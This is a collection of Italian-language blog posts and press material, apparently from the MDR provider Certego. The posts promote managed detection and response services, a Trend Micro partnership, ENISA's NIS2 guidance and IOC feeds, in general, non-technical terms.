Analisi post-incidente Una volta risolta la situazione, il team esamina nel dettaglio l’evento, anche con l’impiego dell’analisi forense, individuando le cause alla radice e implementando misure preventive per ridurre le possibilità di attacchi simili in futuro.

Managed Detection and Response per un Natale sicuro e sereno

Investire in un servizio di Managed Detection & Response significa garantire una protezione continua per la tua azienda, 24 ore su 24, 7 giorni su 7, anche durante le festività. Il monitoraggio costante e la risposta rapida agli incidenti offrono quella serenità necessaria per goderti le feste senza preoccupazioni, sapendo che la tua azienda è in buone mani. Non lasciare che i cybercriminali rovinino il tuo Natale. Affidati ai servizi MDR di Certego e goditi le vacanze con la sicurezza che i tuoi sistemi siano protetti in ogni momento.

Preparazione, strategia e confronto con l’avversario: l’MDR spiegato attraverso il calcio

Pier Giorgio Bergonzi, Product Marketing — Wed, 11 Dec 2024 23:00:00 GMT

La cybersecurity, proprio come il calcio, è una combinazione di strategia, preparazione e competizione. Ogni azione sul campo, sia esso fisico o digitale, contribuisce a un piano più ampio che mira a raggiungere obiettivi concreti e garantire il successo.

Nel calcio, avere una difesa solida è il pilastro del gioco: protegge la squadra dagli attacchi avversari e crea le condizioni per costruire azioni di gioco efficaci. Serve inoltre una squadra ben preparata, un team tecnico con una visione di gioco chiara, la capacità di leggere i cambiamenti durante la partita e la prontezza di rispondere e adattarsi in tempo reale alle mosse dell’avversario.

Allo stesso modo, la cybersecurity richiede una strategia completa che combini rilevamento, analisi e risposta per garantire non solo la resilienza, ma anche la competitività di un’azienda. Gestire la sicurezza di un’azienda è come essere allenatori e giocatori di una squadra di calcio: bisogna essere pronti sul campo di gioco, in grado di leggere il gioco dell’avversario (i cybercriminali) per anticiparne le mosse e agire con determinazione, proprio come si costruisce e protegge un vantaggio durante una partita decisiva.

La preparazione

Studiare l’avversario

Nel calcio, nel periodo di avvicinamento a una partita, la squadra si dedica all’analisi dell’avversario: osserva come ha giocato in precedenza, studia le strategie adottate, identifica i punti di forza da contrastare e le debolezze da sfruttare. Questo lavoro è fondamentale per costruire un piano di gioco solido e scendere in campo con la preparazione necessaria ad affrontare qualsiasi scenario.

Allo stesso modo, un servizio MDR si basa sull’analisi approfondita degli avversari, i cybercriminali. Attraverso la threat intelligence e la threat research, l’MDR identifica le tattiche, le tecniche e le procedure (TTP) che questi utilizzano, anticipandone i movimenti. Questo approccio consente di creare un sistema di sicurezza proattivo, capace di neutralizzare le minacce più avanzate prima che possano compromettere gli asset aziendali critici.
Creare una strategia di gioco

Un allenatore sa che, per vincere, nulla può essere lasciato al caso. Ogni schema, posizione e tattica deve essere pianificato con attenzione, e ogni giocatore deve conoscere il proprio ruolo e sapere esattamente come reagire in campo.

Nella cybersecurity, la strategia è altrettanto fondamentale. Un servizio MDR crea un sistema di protezione multilivello, combinando tecnologie avanzate, analisi continua e l’esperienza di esperti qualificati. Ogni componente del sistema lavora in modo integrato e coordinato per garantire una protezione completa del "campo" aziendale.

Questo livello di preparazione non solo protegge da ogni possibile varco, ma riduce significativamente i rischi, rafforzando la resilienza aziendale e aumentando le possibilità di successo contro qualsiasi attacco.

Il confronto sul campo

La difesa come base per l’azione

Nel calcio, una difesa solida è fondamentale, ma non basta per vincere. Proteggere la propria porta con disciplina e organizzazione è essenziale per fermare gli attacchi avversari e impedire loro di segnare. Allo stesso tempo, una difesa efficace deve essere il punto di partenza per sviluppare azioni offensive e avanzare con decisione verso l’obiettivo finale.

L’approccio dell’MDR è simile: non si limita a bloccare le minacce, ma agisce come un regista al centro del campo. Sempre vigile, osserva il gioco, valuta la situazione in tempo reale, detta i tempi, identifica i rischi e coordina le azioni della squadra per adattare le strategie e orchestrare le mosse necessarie a contrattaccare gli avversari (i cybercriminali) e prevenire azioni simili in futuro. Ogni endpoint, utente e sistema è costantemente monitorato, trasformando ogni segnale di anomalia in un’opportunità per consolidare il controllo del campo digitale e mantenere l’iniziativa.
Risposta immediata alle emergenze

Nel calcio, non è purtroppo possibile prevedere tutto. Durante una partita può capitare che l’avversario riesca a creare un’occasione imprevista. In questi momenti, la squadra deve adattarsi rapidamente, cambiando formazione, modificando gli schemi di gioco o passando da una mentalità difensiva a un approccio più offensivo per recuperare il controllo della partita.

È come quando una squadra subisce un gol inaspettato. Invece di cedere alla pressione, il capitano e l’allenatore coordinano rapidamente una nuova strategia: spostano i giocatori in ruoli diversi e intensificano il pressing per riguadagnare terreno. Ogni movimento sul campo diventa cruciale per ribaltare il risultato e creare nuove opportunità per segnare.

Allo stesso modo, nel campo della cybersecurity, l’MDR (Managed Detection and Response) agisce come una squadra pronta a reagire rapidamente a minacce impreviste. Attraverso strategie adattive e risposte immediate, aiuta a contenere l’attacco e a ristabilire la sicurezza dell’ambiente digitale.

L’analisi post-partita

Imparare dall’esperienza

Ogni partita rappresenta una preziosa opportunità di apprendimento per la squadra. Analizzare i momenti chiave consente di affinare la strategia e migliorare le prestazioni future. Ad esempio, osservare una nuova tattica adottata dall’avversario fornisce spunti fondamentali per affrontare al meglio le prossime sfide.

Lo stesso vale per i team di Security Operations dei provider MDR. Grazie all’esperienza maturata sul campo, non si limitano a bloccare le minacce, ma raccolgono dati e informazioni cruciali per adattare e perfezionare continuamente le proprie strategia.

Un servizio MDR svolge analisi approfondite per:
- Comprendere l’origine della minaccia
- Analizzare le azioni intraprese dai cybercriminali
- Identificare i punti di forza e debolezza dei sistemi
Evoluzione continua per restare al top

Come una squadra di calcio che, dopo ogni partita, si prepara alla prossima con allenamenti mirati e strategie adattate, anche il tuo sistema di sicurezza deve evolversi costantemente. L’MDR utilizza l’esperienza accumulata per migliorare la reattività e l’efficienza del sistema, implementando best practice e playbook di risposta predefiniti per affrontare il panorama in continua evoluzione delle minacce informatiche. Inoltre, fornisce consigli utili per aggiornare e ottimizzare continuamente i sistemi di difesa, garantendo una protezione sempre al passo con le nuove sfide.

Un fornitore MDR d’élite lavora instancabilmente, proprio come le squadre più vincenti, per garantire la protezione e la resilienza della tua azienda. Vincere, infatti, non significa solo sapersi difendere: una difesa solida è il cuore della strategia, ma deve essere supportata dalla capacità di anticipare le mosse dell’avversario e rispondere con intelligenza. Sul campo, come nel mondo digitale, preparazione e visione sono essenziali per restare sempre un passo avanti rispetto all’avversario e vincere le partite più importanti!

Threat Intelligence - Vulnerability insights

Sun, 08 Dec 2024 23:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di novembre 2024, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

5 segnali che indicano che hai bisogno di un servizio di Managed Detection & Response

Pier Giorgio Bergonzi, Product Marketing — Tue, 26 Nov 2024 23:00:00 GMT

Le sfide della sicurezza informatica sono sempre più complesse, mettendo molte organizzazioni in difficoltà nel mantenere le difese efficaci.

In questo articolo, analizziamo cinque segnali che possono indicare la necessità per la tua azienda di adottare un servizio di Managed Detection and Response (MDR).

Vedremo come un servizio MDR, integrando tecnologia avanzata, threat intelligence e l’esperienza di esperti di Security Operations, possa offrire un supporto essenziale per affrontare le crescenti sfide della sicurezza informatica.

1- Le minacce richiedono troppo tempo per essere identificate e risolte

Le minacce informatiche, se non rilevate tempestivamente, possono insidiarsi silenziosamente nei sistemi aziendali per giorni, settimane o addirittura mesi. Questo tempo "invisibile" consente agli attaccanti di ampliare la loro portata degli attacchi.

Senza adeguati sistemi di detection, queste minacce spesso passano inosservate, rendendo la risposta agli incidenti più lunga e complessa.

In che modo un servizio MDR può fare la differenza?

Un servizio MDR offre un monitoraggio continuo 24/7, rilevando e segnalando tempestivamente le attività sospette prima che possano causare danni.

Grazie all’uso della tecnologia avanzata, supportata da un team di analisti dedicati che intervengono in tempo reale, è possibile accelerare i tempi di risposta e mitigazione, garantendo una protezione efficace e prevenendo rischi prolungati per la tua azienda.

2- Le minacce si evolvono più rapidamente delle tue capacità di difesa

I criminali informatici sviluppano costantemente nuove tecniche per superare le difese tradizionali. Se non riesci a stare al passo, la tua organizzazione rischia di trovarsi sempre in svantaggio.

In che modo un servizio MDR può fare la differenza?

Un servizio MDR rafforza il tuo team interno con esperti di threat hunting, capaci di identificare proattivamente le minacce più sofisticate.

Attraverso informazioni avanzate di threat intelligence e l’analisi del comportamento degli attaccanti, consente di prevedere e contrastare proattivamente le azioni dei criminali informatici e aggiornare i sistemi di difesa prima che le minacce si concretizzino, garantendoti un vantaggio strategico e una maggiore resilienza.

3- Troppe aree dell’infrastruttura IT sono invisibili

La mancanza di visibilità su alcuni segmenti della rete, dispositivi critici o ambienti cloud rappresenta una grave debolezza nella tua strategia di sicurezza.

Queste zone cieche diventano facilmente bersagli per i criminali informatici, che le sfruttano per infiltrarsi, muoversi lateralmente e nascondersi, rendendo estremamente difficile il rilevamento e la risposta tempestiva alle minacce.

In che modo un servizio MDR può fare la differenza?

I migliori servizi MDR offrono una visibilità completa e una risposta immediata su tutte le superfici di attacco.

Attraverso una piattaforma centralizzata di monitoraggio e l’analisi avanzata dei dati telemetrici, riescono a eliminare i punti ciechi e a fornire una comprensione dettagliata di ogni livello dell’infrastruttura.

4- Il tuo team è sommerso dagli avvisi di sicurezza

Un volume eccessivo di avvisi, spesso arricchito da numerosi falsi positivi, può distrarre il tuo team e portare alla trascuratezza di segnali critici. I sistemi di sicurezza generano costantemente notifiche, ma senza una gestione efficiente, è facile che le minacce reali passino inosservate.

Questo non solo aumenta i rischi per la tua organizzazione, ma contribuisce anche alla cosiddetta "fatica da alert", che riduce la produttività e il morale del team.

In che modo un servizio MDR può fare la differenza?

Un servizio MDR d’élite può semplificare significativamente la gestione degli incidenti, consentendo al tuo team di concentrarsi sulle attività più strategiche e ad alto valore aggiunto.

Il provider MDR pre-filtra gli eventi anomali, eliminando i falsi positivi e segnalando solo le minacce che rappresentano un rischio concreto, migliorando l’efficacia e la tempestività nella gestione degli incidenti.

5 - Il carico di lavoro sta crescendo senza sosta

L’aumento costante del numero di dispositivi, utenti e applicazioni rende la gestione della sicurezza sempre più complessa e impegnativa.

I team interni, spesso già sovraccarichi, rischiano di commettere errori o di non riuscire a rispondere tempestivamente agli incidenti, con conseguenze che riducono l’efficacia complessiva delle difese e aumentano la vulnerabilità dell’organizzazione.

In che modo un servizio MDR può fare la differenza?

Collaborare con un fornitore MDR ti permette di accedere immediatamente a un team di esperti dedicati, che monitorano costantemente il tuo ambiente IT e intervengono in tempo reale per contrastare le minacce.

Grazie alla presenza di specialisti attivi 24/7, il servizio MDR diventa un’estensione del tuo team, liberandoti dal carico di lavoro operativo. In questo modo, puoi concentrare le risorse interne sulle attività strategiche e continuare a gestire il tuo business con maggiore serenità e sicurezza.

Affrontare le sfide della cybersecurity non è mai stato così complesso. Se stai riscontrando uno o più di questi segnali — tempi di risposta troppo lunghi, minacce sempre più avanzate, sovraccarico di avvisi, mancanza di visibilità e un carico di lavoro in continuo aumento — è il momento di considerare un servizio MDR.

Un servizio avanzato di Managed Detection & Response può diventare il tuo alleato strategico, offrendo monitoraggio continuo, competenze avanzate e una gestione efficace delle minacce per garantire una protezione completa e proattiva.

Un’alleanza innovativa per la sicurezza IT: nasce una nuova offerta tecnologica di Certego e Trend Micro

Sun, 24 Nov 2024 23:00:00 GMT

Modena, 25 Novembre 2024 - Certego, società del gruppo VEM sistemi specializzata in servizi di sicurezza IT gestiti e di contrasto al Cybercrime, insieme a Trend Micro, leader globale nella cybersecurity, ha sviluppato una soluzione tecnologica proprietaria nella sua piattaforma cloud di Unified Security Operations PanOptikon©, in grado di integrarsi con Trend Vision OneTM e garantire una protezione proattiva di detection e response unica nel mercato italiano.

La soluzione, realizzata dal team di sviluppo di Certego con il contributo di Trend Micro, è frutto di una stretta collaborazione tra le due aziende che hanno lavorato sinergicamente nell'ultimo anno per realizzarla, portando alla nascita di una partnership tecnologica e commerciale di altissimo livello. La collaborazione va oltre la proposizione di un tradizionale servizio SOC (Security Operations Center): si configura come un servizio avanzato, risultato dell'integrazione nativa tra le tecnologie dei due vendor, in grado di offrire ai clienti molto più di un semplice monitoraggio degli allarmi. Grazie alla possibilità di accedere ai dati telemetrici di Trend Micro, la soluzione garantisce infatti i vantaggi di una piattaforma XDR completa aggiungendo ulteriori logiche di analisi e i dati di Threat Intelligence di Certego, specificamente mirati alle esigenze delle imprese e al contesto cyber italiano. Questo approccio innovativo rende la nuova tecnologia una risorsa preziosa per le aziende che necessitano non solo di protezione, ma anche di un'analisi approfondita delle minacce fin dai primi sintomi di una potenziale compromissione. Attraverso questa sinergia, Certego e Trend Micro rispondono alle moderne sfide della sicurezza, offrendo una soluzione ineguagliabile e concepita per fornire un servizio di detection e response che supera le offerte tradizionali, apportando un valore aggiunto concreto all’intero del mercato della cybersecurity.

“Abbiamo deciso di collaborare con Trend Micro per la comprovata affidabilità della loro soluzione XDR, tra le più avanzate sul mercato.” Dichiara Bernardino Grignaffini, CEO & founder di Certego, che prosegue: “Questa partnership ha reso possibile la creazione di un servizio esclusivo sul mercato. La nostra tecnologia supera il concetto tradizionale di integrazione e non si occupa di semplice monitoraggio; Certego fornisce servizi MDR (Managed Detection and Response) con un approccio proattivo, che va oltre la semplice gestione degli alert, tipica di un SOC. Analizziamo in modo approfondito tecniche, tattiche e tipologie di attacco per applicare le nostre conoscenze sui dati di Trend Micro, rendendoli così pienamente funzionali alle attività di rilevamento. Questo approccio costituisce l'elemento distintivo di Certego, massimizzando il valore della tecnologia Trend Micro."

“L’alleanza pluriennale con il gruppo VEM e la collaborazione con Certego sono un vanto per offrire un servizio MDR all’avanguardia che risponde alle esigenze critiche di cybersecurity delle aziende moderne,” dichiara Salvatore Marcis Head of Channel and Territory Sales Trend Micro “Grazie alla nostra tecnologia XDR e all’approccio analitico e proattivo di Certego, possiamo garantire una protezione su misura che va oltre la semplice risposta agli attacchi, offrendo una sicurezza adattiva e integrata. Questa partnership valorizza la nostra visione di una difesa collaborativa e continua, massimizzando il potenziale della nostra tecnologia nelle mani di un team di esperti."

I clienti che sceglieranno i servizi Certego della nuova tecnologia integrata nella piattaforma di Trend Micro potranno usufruire di soluzioni XDR avanzate, combinate con un servizio MDR guidato dalla threat intelligence. Un ulteriore vantaggio per i clienti è la gestione completa degli alert e dei rischi, con notifiche non solo sugli incidenti ma anche sui potenziali pericoli, grazie a un monitoraggio continuo e proattivo. Inoltre, i clienti avranno accesso in tempo reale alle dashboard presenti in PanOptikon®, che offrono una visione completa e aggiornata dello stato di sicurezza aziendale. La piattaforma non si limita ai singoli alert ma fornisce report e dashboard dettagliati, arricchiti dai dati di Trend Micro, consentendo una visione globale e approfondita del livello di cyber risk dell'azienda.

La sinergia tra Trend Micro e Certego, prossima a ricevere dal vendor la qualificazione come “authorized MSSP”, è il risultato di oltre vent’anni di collaborazione tra il leader globale nella cybersecurity e il gruppo VEM Sistemi. L’integrazione tra Certego e Trend Micro, unita alla storica collaborazione con VEM, offre ai clienti un ecosistema di alto livello che include una gestione centralizzata e completa di tutte le fasi: installazione, configurazione, prevenzione, detection e response. A seconda delle esigenze, i clienti possono contare su un pool di specialisti altamente qualificati che si occuperà delle loro necessità. L'offerta è parte di V-Secure, il modello di Gestione Integrata della Sicurezza IT sviluppato da VEM sistemi, che copre tutte e quattro le fasi del Governo della Sicurezza Informatica: Anticipazione del Rischio, Prevenzione, Rilevamento e Risposta agli incidenti. V-Secure oggi è in grado di offrire un servizio di gestione degli endpoint arricchito da tutti i vantaggi della sinergia tecnologica tra Certego e Trend Micro.

Certego

Certego Srl è la società del Gruppo VEM sistemi specializzata nell’erogazione di servizi MDR (Managed Detection and Response). Fondata nel 2013 e con sede a Modena, si distingue nel panorama italiano per un modello di business innovativo e un’offerta esclusiva, basati su PanOptikon®, la piattaforma proprietaria di Unified Security Operations, e su un team di analisti senior con le principali certificazioni internazionali nel settore. Con oltre 200 clienti attivi, più di un milione di asset IT monitorati e 10.000 incidenti gestiti nel 2023, Certego adotta un modello di protezione proattivo guidato dalla threat intelligence e dall'analisi delle tecniche di attacco degli avversari, per prevenire le minacce e garantire una risposta rapida ed efficace in caso di attacco. Il team di Security Operations di Certego si avvale di un gruppo eterogeneo di specialisti altamente qualificati nei vari ambiti della cybersecurity, tra cui Cybersecurity Analyst, Threat Researcher, Incident Responder ed esperti in analisi forense. www.certego.net.

Trend Micro

Trend Micro, leader globale di cybersecurity, è impegnata a rendere il mondo un posto più sicuro per lo scambio di informazioni digitali. Con oltre 30 anni di esperienza nella security, nel campo della ricerca sulle minacce e con una propensione all’innovazione continua, Trend Micro protegge oltre 500.000 organizzazioni e milioni di individui che utilizzano il cloud, le reti e i più diversi dispositivi, attraverso la sua piattaforma unificata di cybersecurity. La piattaforma unificata di cybersecurity Trend Vision One™ fornisce tecniche avanzate di difesa dalle minacce, XDR e si integra con i diversi ecosistemi IT, inclusi AWS, Microsoft e Google, permettendo alle organizzazioni di comprendere, comunicare e mitigare al meglio i rischi cyber. Con 7.000 dipendenti in 65 Paesi, Trend Micro permette alle organizzazioni di semplificare e mettere al sicuro il loro spazio connesso. www.trendmicro.com.

VEM sistemi

Da 38 anni VEM sistemi è uno degli ICT player italiani più innovativi, attento a intercettare le nuove tendenze del settore, rendendole funzionali alle esigenze dei clienti. Forlivese di nascita con sedi a Milano, Modena, Padova, Roma e Senigallia, il Gruppo VEM conta oggi 400 dipendenti e tre controllate: Certego, specializzata nei servizi di Cyber Threat Intelligence e contrasto al cybercrime, Mydev, dedicata allo sviluppo di soluzioni di software integration, business intelligence e piattaforme digitali su hybrid e public cloud e NEEN, Managed Cloud Provider specializzato nella progettazione e gestione di infrastrutture distribuite e ad alta affidabilità. Oggi VEM è riconosciuta come partner di riferimento per la trasformazione digitale di PMI e grandi aziende, con una visione olistica che va dalla cybersecurity, alla business continuity, dalla collaboration, al data center, fino all'automazione dell'edificio e allo sviluppo software. Rendere semplice la fruizione di soluzioni e servizi che sottendono un'elevata complessità di integrazione tecnologica è la sua qualità distintiva. www.vem.com.

Threat Intelligence - Vulnerability insights

Mon, 11 Nov 2024 23:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di ottobre 2024, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

Security Operations Report - Ottobre 2024

Mon, 04 Nov 2024 23:00:00 GMT

Avere una chiara consapevolezza dei rischi a cui le aziende sono maggiormente esposte è essenziale per comprendere i trend degli attacchi informatici.

Il report risponde a domande cruciali, come:

Gli incidenti sono diventati più pericolosi? Quali settori risultano maggiormente vulnerabili? Qual è la proporzione tra falsi positivi e incidenti reali?

Compila il modulo per ricevere il PDF completo.

NIS2 - ENISA pubblica la bozza della guida tecnica per conformarsi alla direttiva

Pier Giorgio Bergonzi, Product Marketing — Wed, 23 Oct 2024 22:00:00 GMT

In data 7 novembre 2024, l’ENISA (Agenzia dell'Unione Europea per la Cybersecurity) ha pubblicato la bozza della guida tecnica per supportare gli Stati membri ed enti dell'Unione Europea nell'attuazione dei requisiti tecnici e metodologici previsti dalle misure di gestione del rischio di cybersecurity stabilite dal Regolamento di esecuzione della Commissione (UE) 2024/2690 del 17 ottobre 2024.

Questo strumento rappresenta un fondamentale punto di riferimento per le organizzazioni che si confrontano con le sfide della direttiva NIS2, in vigore in tutta Europa.

Perché la guida tecnica di ENISA è così utile?

L'obiettivo della guida tecnica è fornire supporto operativo attraverso tre principali risorse:

Consigli pratici per l'implementazione dei requisiti e chiarimenti sui concetti chiave: la guida offre spiegazioni dettagliate su concetti e termini specifici utilizzati nel testo legislativo, con suggerimenti su come affrontare al meglio ogni requisito. Questo aiuto diretto è prezioso per le organizzazioni, facilitando la comprensione e la traduzione dei requisiti legali in misure pratiche.
Esempi di evidenze per la verifica di conformità: la guida include esempi concreti di documentazione e procedure che le organizzazioni possono utilizzare per dimostrare la conformità ai requisiti della NIS2, semplificando il lavoro di verifica e migliorando l'affidabilità dei controlli.
Mappatura dei requisiti di sicurezza rispetto agli standard europei e internazionali: la guida include le tabelle che mettono in relazione i requisiti del Regolamento di esecuzione con vari standard internazionali (come ISO 27001) e con quadri normativi nazionali, permettendo alle organizzazioni di armonizzare le proprie pratiche di cybersecurity con altre norme già esistenti.

Contesto e consultazione pubblica

La Direttiva NIS2, entrata in vigore nell'ottobre 2024, è il nuovo quadro normativo europeo per la cybersecurity, con l'obiettivo di incrementare la resilienza dei settori critici dell'UE. La Commissione Europea, attraverso il regolamento di esecuzione, ha specificato i requisiti di gestione del rischio di cybersecurity per vari settori, tra cui fornitori di infrastrutture digitali, provider di servizi cloud, data center, e piattaforme di social networking.

La bozza della guida tecnica dell’ENISA è attualmente disponibile per una consultazione pubblica, aperta fino al 9 dicembre 2024, e le istruzioni su come inviare il proprio feedback sono disponibili sul sito ENISA. Questo processo permette agli attori del settore di fornire un contributo diretto, rendendo la guida ancora più efficace e in linea con le reali esigenze operative.

Grazie a questa iniziativa, ENISA sta supportando attivamente l'implementazione di un livello elevato di sicurezza informatica in Europa, fornendo alle organizzazioni un quadro pratico e coerente per adeguarsi alle richieste della NIS2 e contribuire a un sistema digitale europeo più sicuro e resiliente.

Scarica la guida

MDR - Come scegliere il servizio migliore per la tua azienda

Pier Giorgio Bergonzi, Product Marketing — Wed, 23 Oct 2024 22:00:00 GMT

Nel contesto attuale della sicurezza informatica, i servizi di Managed Detection and Response (MDR) offrono una soluzione di cybersecurity che combina tecnologie avanzate e competenze umane per rilevare e rispondere rapidamente alle minacce, ampliando le capacità difensive di un'organizzazione.

Rispetto ai tradizionali Security Operations Center (SOC), che si concentrano principalmente sulla gestione degli alert tramite diverse tecnologie di difesa, l'MDR adotta un approccio più proattivo. Oltre al monitoraggio continuo 24/7 e alla risposta agli incidenti, l'MDR integra funzionalità come l'analisi comportamentale, la caccia alle minacce (Threat Hunting) e la Threat Intelligence per studiare e identificare in anticipo le minacce più innovative.

Questa proattività rende l'MDR una soluzione particolarmente efficace per le organizzazioni che cercano una protezione costante, aggiornata e su misura.

Ma come scegliere il servizio MDR più adatto alla tua azienda? In questo articolo offriamo una panoramica delle caratteristiche chiave da valutare per prendere una decisione informata.

Per ulteriori approfondimenti, puoi scaricare la nostra guida su come scegliere il miglior servizio MDR per la tua azienda, che include una serie di domande fondamentali da porre al fornitore per valutarne l'affidabilità e l'idoneità alla tua organizzazione.

La tecnologia alla base di un servizio MDR

Nel valutare un servizio di Managed Detection and Response (MDR), la tecnologia è un elemento cruciale, poiché influisce direttamente sulla qualità del servizio.

Affidarsi a un servizio MDR basato su una piattaforma proprietaria che unifica in un’unica console le diverse funzioni per la gestione completa della sicurezza, offre un significativo vantaggio. Questo approccio riduce la frammentazione operativa, migliorando i tempi di risposta agli incidenti e l'efficienza generale delle operazioni di security.

Una piattaforma di Unified Security Operations consente di:

Andare oltre la gestione degli alert, integrando funzionalità avanzate come SOAR, SIEM;
Fornire un'analisi completa e aggiornata del rischio informatico a cui l’azienda è esposta;
Unificare le comunicazioni tra cliente e fornitore in una sola console, facilitando la collaborazione e migliorando la gestione della sicurezza;
Accedere ai dati telemetrici degli endpoint per potenziare le capacità di rilevamento e condurre analisi approfondite sugli eventi di sicurezza;
Personalizzare le regole di rilevamento in base alle esigenze specifiche dell'azienda, con la possibilità di modificare la gravità dei ticket, sviluppare correlazioni su misura e integrare log specifici;
Ottenere report dettagliati, adattabili ai diversi stakeholder, come team IT, CIO e management.

Servizi offerti: personalizzazione e proattività

Nella scelta di un fornitore MDR, i servizi offerti sono un fattore cruciale. È importante verificare che il servizio garantisca alti livelli di personalizzazione e una risposta tempestiva alle minacce.

Un servizio MDR di qualità deve essere supportato da un team di esperti specializzati in vari ambiti della sicurezza informatica, come Cyber Security Analysts, Threat Hunters e Incident Responders.

L'approccio ideale punta ad anticipare le minacce, adattando i sistemi di difesa prima che si verifichino, superando il tradizionale modello SOC, focalizzato sulla risposta agli incidenti.

Quando valuti i servizi del provider MDR, considera questi aspetti:

Presenza di esperti senior specializzati in diversi ambiti della cybersecurity;
Un servizio d'élite include un Customer Service Specialist dedicato, che accompagna il cliente dall'onboarding alla revisione continua dei servizi. Questa figura fornisce aggiornamenti personalizzati sullo stato della sicurezza e consigli proattivi per migliorare le difese;
Verifica che le attività di Incident Response siano incluse nel pacchetto offerto. L'assenza di tali attività potrebbe generare criticità significative e rendere difficile stimare con precisione i costi complessivi del servizio al momento della firma del contratto.

La Threat Intelligence: conoscere e anticipare le minacce

Nella valutazione di un servizio MDR, l'integrazione con servizi di Threat Intelligence è essenziale per un approccio volto ad anticipare le minacce.

Quando valuti i servizi di Threat Intelligence del provider MDR, assicurati che:

I dati non si limitino alle informazioni dal deep e dark web basate su fonti OSINT (Open Source Intelligence). I migliori servizi MDR forniscono dati di Threat Intelligence azionabili, utili per una risposta proattiva. Questi dati, noti come Tactical Threat Intelligence, vengono raccolti costantemente tramite sensori e honeypot proprietari, fornendo informazioni in tempo reale sulle minacce emergenti. Questo approccio non solo ottimizza il monitoraggio, ma consente di adattare dinamicamente le difese contro le tecniche di attacco più avanzate;
Il provider abbia un ecosistema applicativo proprietario di Threat Intelligence, in grado di raccogliere, aggregare e arricchire i dati in tempo reale, automatizzando l'aggiornamento delle regole di detection. L'uso di IOC (Indicator of Compromise) e BIOC (Behavioral Indicator of Compromise) deve garantire un costante adattamento dei sistemi di difesa e una risposta efficace alle minacce emergenti;
Il servizio di Threat Intelligence fornisca dati specifici per il tuo settore e mercato. Ad esempio, un'azienda italiana ha bisogno di indicatori di compromissione mirati alle minacce del contesto italiano;
Il team di Threat Intelligence partecipi attivamente a network e ricerche di settore. La collaborazione in programmi di condivisione di IOC e le partnership con leader globali dimostra l'affidabilità e rilevanza delle informazioni del provider.

Certificazioni e competenze: un sigillo di garanzia

Un ultimo aspetto cruciale nella scelta di un servizio MDR è la verifica delle certificazioni e delle competenze del provider e dei team che lo compongono. Certificazioni nel campo della sicurezza informatica, come CISSP, GIAC o quelle rilasciate da enti europei come ENISA, rappresentano un chiaro indicatore di un alto livello di competenza e conformità agli standard internazionali.

Inoltre, la partecipazione a network internazionali di sicurezza e progetti di ricerca avanzati è un ulteriore segnale di affidabilità, dimostrando che il provider è sempre aggiornato sulle ultime tendenze e sulle minacce emergenti.

Scegliere il miglior servizio MDR per la tua azienda richiede un'analisi approfondita e la valutazione di diversi fattori: dalla tecnologia impiegata, ai servizi offerti, fino alle certificazioni del provider.

Per approfondire ogni aspetto trattato in questo articolo e supportarti nel processo decisionale abbiamo realizzato una guida dettagliata intitolata "Come scegliere il servizio MDR migliore per la tua azienda." La guida esamina in profondità le caratteristiche essenziali che un provider MDR dovrebbe possedere per soddisfare le necessità della tua organizzazione. Inoltre, include la lista di domande chiave da porre al fornitore, pensata per aiutarti a valutare in modo critico e approfondito le diverse opzioni disponibili, garantendo così una scelta pienamente consapevole e allineata alle tue esigenze.

Come scegliere il servizio MDR migliore per la tua azienda

Wed, 23 Oct 2024 22:00:00 GMT

Nel contesto attuale della sicurezza informatica, i servizi di Managed Detection and Response (MDR) offrono una soluzione di cybersecurity che combina tecnologie avanzate e competenze umane per rilevare e rispondere rapidamente alle minacce, ampliando le capacità difensive di un'organizzazione.

Nel panorama odierno, caratterizzato da una crescente offerta di soluzioni di cybersecurity, le aziende si trovano spesso di fronte a un'ampia gamma di servizi MDR disponibili sul mercato. Questa abbondanza di opzioni, pur rappresentando un vantaggio in termini di scelta, può talvolta rendere difficile identificare il provider più adatto alle proprie esigenze specifiche.

Per supportarti in questo processo decisionale, abbiamo realizzato una guida dettagliata intitolata "Come scegliere il servizio MDR migliore per la tua azienda." La guida esamina in profondità le caratteristiche essenziali che un provider MDR dovrebbe possedere per soddisfare le necessità della tua organizzazione. Inoltre, include la lista di domande chiave da porre al fornitore, pensata per aiutarti a valutare in modo critico e approfondito le diverse opzioni disponibili, garantendo così una scelta pienamente consapevole e allineata alle tue esigenze.

Compila il form per ricevere la guida completa.

Threat Intelligence - Vulnerability insights

Tue, 01 Oct 2024 22:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di settembre 2024, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

IOC Feed

Pier Giorgio Bergonzi, Product Marketing — Thu, 26 Sep 2024 22:00:00 GMT

Per ottimizzare il rilevamento e la prevenzione degli attacchi, è essenziale sviluppare una strategia di Threat Intelligence in grado di potenziare le operazioni di Detection e Response. Ciò avviene analizzando e contestualizzando gli attacchi, identificando gli attori malevoli, le loro motivazioni e le risorse utilizzate.

Gli IOC (Indicatori di Compromissione) rappresentano le tracce concrete di un incidente informatico: consentono di rilevare potenziali violazioni e offrono informazioni cruciali per comprendere a fondo la natura di un attacco, migliorare le difese e prevenire attacchi futuri.

Questi indicatori, raccolti dopo una compromissione, sono fondamentali per rafforzare le strategie di sicurezza e ridurre il rischio di nuove vulnerabilità

Gli IOC svolgono due attività fondamentali:

Potenziamento dei Firewall:

Rappresentano uno strumento cruciale per potenziare le capacità di difesa dei firewall. L'importazione e l'applicazione di IOC aggiornati consentono ai firewall di identificare con maggiore precisione comportamenti sospetti o malevoli di ultima generazione, riducendo i falsi positivi e aumentando l'efficacia complessiva delle difese.
Analisi più avanzate:

Consentono agli analisti di poter contare su dati di analisi sempre aggiornati, per condurre indagini più approfondite, comprendere la natura di un attacco e bloccarlo. Permettono di implementare linee di difesa aggiornate e di adattare le strategie di sicurezza in base alle nuove minacce rilevate, aumentando la resilienza complessiva.

Ecosistema Applicativo e Threat Intelligence proprietaria di Certego

Gli IOC raggiungono il loro pieno potenziale solo se vengono adeguatamente monitorati e gestiti, trasformandosi da semplici identificatori in informazioni azionabili per i firewall e per le attività di analisi.

